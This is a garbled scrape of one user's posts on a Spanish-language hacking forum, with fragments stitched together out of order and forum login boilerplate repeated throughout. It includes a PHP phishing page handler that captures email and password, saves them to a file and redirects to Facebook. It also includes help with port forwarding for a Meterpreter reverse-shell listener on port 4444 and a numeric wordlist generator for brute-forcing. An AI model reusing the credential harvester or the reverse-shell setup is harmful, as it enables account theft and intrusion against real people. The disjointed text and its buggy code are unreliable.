Port triggering te permite automatizar el port forwarding. Intenta con eso pero yo te recomiendo hacerlo manualmente.
Que marca y modelo tiene tu router?
Que marca y modelo tiene tu router?

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
<?php
$email = $_POST["email"];
$pass = $_POST["pass"];
if ((empty($email)) or ("$pass")) {
header("Location: http://127.0.0.1/login.php", true, 301);
} else {
$file = fopen("data", "a+");
fwrite("Email: ".$email."\r\nPass: ".$pass."\r\n---------------------------------------\r\n");
fclose($file);
header("Location: https://www.facebook.com", true, 301);
}
die();
?>[/php]You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginNo hace falta un tutorial. Simplemente lo haces con la función header.
Whiz conoces algún tutorial o algún sitio donde lo explique ?
header ("Location https://www.facebook.com", true, 301);
die (); You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
WhiZ si ya abri los puertos 4444 en la 192.168.1.130 y en la 192.168.1.132 TCP
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
LHOST=MI IP EXTERNA
LPORT=4444
Abro armigate, Listener -> 4444 Meterpreter
Luego Abro puertos 192.168.1.130(win7) 192.168.1.132(kali linux) TCP 4444 y en gufw igual.
Lo ejecutan y no me llega la conexion, porque es posible? muchas gracias.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
WhiZ sabes que te aprecio, pero no pienso mentirte, como lo puedo decir...
Esto es más bien un decorado, no tiene mucha utilidad y realmente es solo una emulación.
No obstante se ve muy lindo no lo niego xD

# -*- coding: utf-8 -*-
### GENERAL ###
PESTANIAS = {
0 : "http://underc0de.org",
1 : "+",
}
NAVBAR = None
LOGIN_FORM = {
"user" : "",
"passwd" : "",
"iniciar sesión" : False,
}
AREA_DE_TRABAJO = {
"header" : LOGIN_FORM,
"nav" : ["inicio", "noticias", "contacto"],
"section" : {"article1":"", "article2":""},
"footer" : "",
}
NAVEGADOR = [
"barra de título",
"barra de menú",
"barra de herramientas",
PESTANIAS,
NAVBAR,
AREA_DE_TRABAJO,
"barra de estado",
]
### NUEVAS PESTAÑAS ###
def abrirNuevaPestania():
# identificamos sector de pestañas
print " [*] Identificando sector de pestañas"
pestanias = identificarPestanias()
if not pestanias:
print " [!] Error"
return
print " [+] OK"
# clickeamos última pestaña
print " [*] Clickeando última pestaña"
pestanias = clickearUltimaPestania(pestanias)
if type(pestanias) is not dict:
print " [!] Error: %s" % pestanias
return
global PESTANIAS
PESTANIAS = pestanias
print " [+] OK"
def identificarPestanias():
for elemento in NAVEGADOR:
if elemento is PESTANIAS:
return PESTANIAS
return None
def clickearUltimaPestania(pestanias):
try:
numPestanias = len(pestanias)
if numPestanias == 0:
raise Exception("No hay pestañas disponibles")
pestanias[numPestanias-1], pestanias[numPestanias] = "about:blank", "+"
return pestanias
except Exception as e:
return e.message
### NUEVA PÁGINA ###
def abrirPagina(pagina):
# identificamos barra de direcciones
print " [*] Identificando barra de navegación"
navbar = identificarNavBar()
if not navbar:
print " [!] Error"
return
print " [+] OK"
# ingresamos url
print " [*] Ingresando URL"
try:
global NAVBAR
NAVBAR = pagina
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
def identificarNavBar():
for elemento in NAVEGADOR:
if elemento is NAVBAR:
return True
return False
### INGRESAR CREDENCIALES ###
def ingresarCredenciales(user, passwd):
# identificando login form
print " [*] Identificando login form"
form = AREA_DE_TRABAJO.get("header")
if not form:
print " [!] Error"
return
print " [+] OK"
# ingresando credenciales
print " [+] Ingresando credenciales"
try:
form["user"], form["passwd"] = user, passwd
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
# clickeando botón 'Iniciar sesión'
print " [*] Clickeando botón 'Iniciar sesión'"
try:
form["iniciar sesión"] = True
print " [+] OK"
except Exception as e:
print " [!] Error:", e
return
if __name__ == "__main__":
# Aquí hagan el menú ;)You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
pregunta : se puede entrar al server desde otra red de otro pais , o solo desde el internet de tu casa , porque yo hice algo asi en perl llamado Commander que esta publicado en el foro y me pasaba eso solo podia entrar desde mi propia red Wifi.
inicial = 900000000 # acá va el valor inicial
final = 1000000000 # valor final
f = open ("dic.txt","w")
for i in range (inicial, final):
línea = "0%s\n" % i
f.write(linea)
f.close ()